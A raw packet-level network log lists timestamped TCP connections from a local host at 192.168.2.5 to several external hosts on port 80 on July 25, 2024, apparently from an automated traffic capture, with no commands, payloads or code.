Jul 25, 2024 12:08:35.120347023 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:35.120762110 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.120775938 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.120788097 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.120800018 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.120811939 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.120815039 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:35.120841980 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:35.120873928 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:35.121052027 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.121064901 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.121103048 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:35.125482082 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.125561953 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.125603914 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:35.125679016 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.177107096 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:35.211335897 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.211361885 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.211376905 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.211427927 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:35.211838007 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.211853027 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.211865902 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.211893082 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:35.211921930 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:35.212030888 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.212043047 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.212054968 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.212088108 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:35.212877035 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.212933064 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:35.212951899 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.212969065 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.213030100 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:35.213284016 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.213824987 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.213881969 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:35.214050055 CEST	80	49729	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:35.214104891 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:35.958385944 CEST	49729	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:36.974441051 CEST	49730	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:36.979425907 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:36.979507923 CEST	49730	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:36.979676962 CEST	49730	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:36.984592915 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.589132071 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.589639902 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.589658976 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.590857983 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.590881109 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.592060089 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.592086077 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.592118979 CEST	49730	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:37.592300892 CEST	49730	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:37.593184948 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.593199968 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.593210936 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.596297979 CEST	49730	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:37.598731995 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.599526882 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.599540949 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.600302935 CEST	49730	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:37.684554100 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.684571028 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.684581041 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.684601068 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.685441971 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.685527086 CEST	49730	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:37.686352015 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.689229965 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.689277887 CEST	49730	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:37.689460039 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.689475060 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.689485073 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.689960957 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.689973116 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.689982891 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.689999104 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.689997911 CEST	49730	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:37.690009117 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.690021992 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:37.690061092 CEST	49730	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:37.690299988 CEST	49730	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:37.690300941 CEST	49730	80	192.168.2.5	67.223.117.189
Jul 25, 2024 12:08:37.696281910 CEST	80	49730	67.223.117.189	192.168.2.5
Jul 25, 2024 12:08:42.724440098 CEST	49731	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:08:42.730427980 CEST	80	49731	23.251.54.212	192.168.2.5
Jul 25, 2024 12:08:42.730516911 CEST	49731	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:08:42.730765104 CEST	49731	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:08:42.735538006 CEST	80	49731	23.251.54.212	192.168.2.5
Jul 25, 2024 12:08:44.240324020 CEST	49731	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:08:44.293745041 CEST	80	49731	23.251.54.212	192.168.2.5
Jul 25, 2024 12:08:45.255565882 CEST	49732	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:08:45.261368036 CEST	80	49732	23.251.54.212	192.168.2.5
Jul 25, 2024 12:08:45.261444092 CEST	49732	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:08:45.261677980 CEST	49732	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:08:45.268068075 CEST	80	49732	23.251.54.212	192.168.2.5
Jul 25, 2024 12:08:46.770826101 CEST	49732	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:08:46.821760893 CEST	80	49732	23.251.54.212	192.168.2.5
Jul 25, 2024 12:08:47.792320013 CEST	49733	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:08:47.797415018 CEST	80	49733	23.251.54.212	192.168.2.5
Jul 25, 2024 12:08:47.800404072 CEST	49733	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:08:47.802118063 CEST	49733	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:08:47.807945967 CEST	80	49733	23.251.54.212	192.168.2.5
Jul 25, 2024 12:08:47.808024883 CEST	80	49733	23.251.54.212	192.168.2.5
Jul 25, 2024 12:08:49.302083015 CEST	49733	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:08:49.358033895 CEST	80	49733	23.251.54.212	192.168.2.5
Jul 25, 2024 12:08:50.318136930 CEST	49734	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:08:50.324198008 CEST	80	49734	23.251.54.212	192.168.2.5
Jul 25, 2024 12:08:50.324321985 CEST	49734	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:08:50.324546099 CEST	49734	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:08:50.330415010 CEST	80	49734	23.251.54.212	192.168.2.5
Jul 25, 2024 12:09:04.161899090 CEST	80	49731	23.251.54.212	192.168.2.5
Jul 25, 2024 12:09:04.162014961 CEST	49731	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:09:06.658615112 CEST	80	49732	23.251.54.212	192.168.2.5
Jul 25, 2024 12:09:06.658714056 CEST	49732	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:09:09.186501980 CEST	80	49733	23.251.54.212	192.168.2.5
Jul 25, 2024 12:09:09.186579943 CEST	49733	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:09:11.683934927 CEST	80	49734	23.251.54.212	192.168.2.5
Jul 25, 2024 12:09:11.686975956 CEST	49734	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:09:11.686975956 CEST	49734	80	192.168.2.5	23.251.54.212
Jul 25, 2024 12:09:11.693146944 CEST	80	49734	23.251.54.212	192.168.2.5
Jul 25, 2024 12:09:16.925151110 CEST	49735	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:16.931209087 CEST	80	49735	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:16.931296110 CEST	49735	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:16.931612968 CEST	49735	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:16.936513901 CEST	80	49735	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:17.619477987 CEST	80	49735	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:17.619493008 CEST	80	49735	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:17.619582891 CEST	49735	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:18.444344997 CEST	49735	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:19.458678961 CEST	49736	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:19.466751099 CEST	80	49736	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:19.466831923 CEST	49736	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:19.467070103 CEST	49736	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:19.471863031 CEST	80	49736	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:20.120373964 CEST	80	49736	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:20.120476007 CEST	80	49736	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:20.128345966 CEST	49736	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:20.974041939 CEST	49736	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:21.989849091 CEST	49737	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:21.996618986 CEST	80	49737	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:21.996913910 CEST	49737	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:22.000355005 CEST	49737	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:22.006105900 CEST	80	49737	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:22.007056952 CEST	80	49737	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:22.690968990 CEST	80	49737	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:22.691581964 CEST	80	49737	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:22.691670895 CEST	49737	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:23.505337000 CEST	49737	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:24.524354935 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:24.529256105 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:24.532489061 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:24.534774065 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:24.539792061 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.225109100 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.225183010 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.225198030 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.225241899 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:25.225723028 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.225733995 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.225744963 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.225773096 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:25.225821972 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:25.226946115 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.226958036 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.226969957 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.227041006 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:25.227315903 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.227369070 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:25.230032921 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.270730019 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:25.318239927 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.318300962 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.318394899 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:25.323556900 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.323838949 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.323856115 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.323888063 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:25.324249983 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.324294090 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:25.324577093 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.324697018 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.324745893 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:25.324804068 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.324815989 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.324882030 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:25.325256109 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:25.325351000 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:25.325476885 CEST	49738	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:09:25.330287933 CEST	80	49738	91.195.240.19	192.168.2.5
Jul 25, 2024 12:09:30.577425957 CEST	49739	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:30.582386971 CEST	80	49739	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:30.582592964 CEST	49739	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:30.582905054 CEST	49739	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:30.588534117 CEST	80	49739	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:32.084340096 CEST	49739	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:32.094229937 CEST	80	49739	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:32.094340086 CEST	49739	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:33.099402905 CEST	49740	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:33.113049030 CEST	80	49740	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:33.113149881 CEST	49740	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:33.113418102 CEST	49740	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:33.120094061 CEST	80	49740	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:33.629857063 CEST	80	49740	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:33.630290031 CEST	80	49740	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:33.630376101 CEST	49740	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:34.616372108 CEST	49740	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:35.630497932 CEST	49741	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:35.706882000 CEST	80	49741	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:35.706995964 CEST	49741	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:35.707304955 CEST	49741	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:35.713458061 CEST	80	49741	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:35.713583946 CEST	80	49741	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:36.183440924 CEST	80	49741	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:36.184365988 CEST	80	49741	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:36.188463926 CEST	49741	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:37.208439112 CEST	49741	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:38.224348068 CEST	49742	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:38.231235981 CEST	80	49742	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:38.231411934 CEST	49742	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:38.232345104 CEST	49742	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:38.237807035 CEST	80	49742	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:40.913192987 CEST	80	49742	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:40.913558006 CEST	80	49742	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:40.913573027 CEST	80	49742	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:40.913870096 CEST	49742	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:40.913870096 CEST	49742	80	192.168.2.5	66.96.162.141
Jul 25, 2024 12:09:40.921150923 CEST	80	49742	66.96.162.141	192.168.2.5
Jul 25, 2024 12:09:46.245109081 CEST	49743	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:46.250405073 CEST	80	49743	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:46.250664949 CEST	49743	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:46.256362915 CEST	49743	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:46.261460066 CEST	80	49743	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:46.874442101 CEST	80	49743	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:46.874455929 CEST	80	49743	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:46.874627113 CEST	49743	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:47.755660057 CEST	49743	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:48.771230936 CEST	49744	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:49.220649004 CEST	80	49744	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:49.220952988 CEST	49744	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:49.221009016 CEST	49744	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:49.226862907 CEST	80	49744	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:49.915518045 CEST	80	49744	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:49.915687084 CEST	80	49744	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:49.915815115 CEST	80	49744	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:49.922415018 CEST	49744	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:50.725142956 CEST	49744	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:51.740056038 CEST	49745	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:51.860816956 CEST	80	49745	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:51.864515066 CEST	49745	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:51.868379116 CEST	49745	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:51.873254061 CEST	80	49745	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:51.873353004 CEST	80	49745	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:52.441039085 CEST	80	49745	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:52.441051006 CEST	80	49745	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:52.441240072 CEST	49745	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:53.380274057 CEST	49745	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:54.396214008 CEST	49746	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:54.402076960 CEST	80	49746	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:54.402370930 CEST	49746	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:54.402515888 CEST	49746	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:54.409868002 CEST	80	49746	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:55.006993055 CEST	80	49746	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:55.007006884 CEST	80	49746	67.198.129.29	192.168.2.5
Jul 25, 2024 12:09:55.007149935 CEST	49746	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:55.007406950 CEST	49746	80	192.168.2.5	67.198.129.29
Jul 25, 2024 12:09:55.014003992 CEST	80	49746	67.198.129.29	192.168.2.5
Jul 25, 2024 12:10:00.056513071 CEST	49747	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:00.061439991 CEST	80	49747	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:00.064491034 CEST	49747	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:00.064728022 CEST	49747	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:00.072335958 CEST	80	49747	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:00.827496052 CEST	80	49747	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:00.827604055 CEST	49747	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:00.830039978 CEST	80	49747	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:00.830111980 CEST	49747	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:01.571208954 CEST	49747	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:01.577596903 CEST	80	49747	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:02.584407091 CEST	49748	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:02.589925051 CEST	80	49748	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:02.590080976 CEST	49748	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:02.592398882 CEST	49748	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:02.597278118 CEST	80	49748	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:04.098922968 CEST	49748	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:04.108959913 CEST	80	49748	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:04.109560966 CEST	49748	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:05.115045071 CEST	49749	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:05.121715069 CEST	80	49749	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:05.121790886 CEST	49749	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:05.122059107 CEST	49749	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:05.128597021 CEST	80	49749	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:05.129544973 CEST	80	49749	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:06.547652960 CEST	80	49749	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:06.547992945 CEST	49749	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:06.632498026 CEST	49749	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:06.638227940 CEST	80	49749	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:07.646388054 CEST	49750	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:07.651540995 CEST	80	49750	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:07.651619911 CEST	49750	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:07.651846886 CEST	49750	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:07.656898022 CEST	80	49750	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:15.231710911 CEST	80	49750	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:15.231995106 CEST	80	49750	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:15.232065916 CEST	49750	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:15.232103109 CEST	49750	80	192.168.2.5	3.33.130.190
Jul 25, 2024 12:10:15.239845037 CEST	80	49750	3.33.130.190	192.168.2.5
Jul 25, 2024 12:10:20.311311007 CEST	49751	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:20.317929983 CEST	80	49751	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:20.318100929 CEST	49751	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:20.318392038 CEST	49751	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:20.323710918 CEST	80	49751	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:20.957909107 CEST	80	49751	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:20.957941055 CEST	80	49751	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:20.958026886 CEST	49751	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:21.833338976 CEST	49751	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:22.849251032 CEST	49752	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:22.854634047 CEST	80	49752	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:22.854751110 CEST	49752	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:22.854939938 CEST	49752	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:22.860039949 CEST	80	49752	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:23.685215950 CEST	80	49752	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:23.685319901 CEST	80	49752	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:23.685332060 CEST	80	49752	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:23.688421011 CEST	49752	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:24.364769936 CEST	49752	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:25.395613909 CEST	49753	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:25.402987003 CEST	80	49753	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:25.403076887 CEST	49753	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:25.405455112 CEST	49753	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:25.412930965 CEST	80	49753	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:25.415225983 CEST	80	49753	91.195.240.19	192.168.2.5
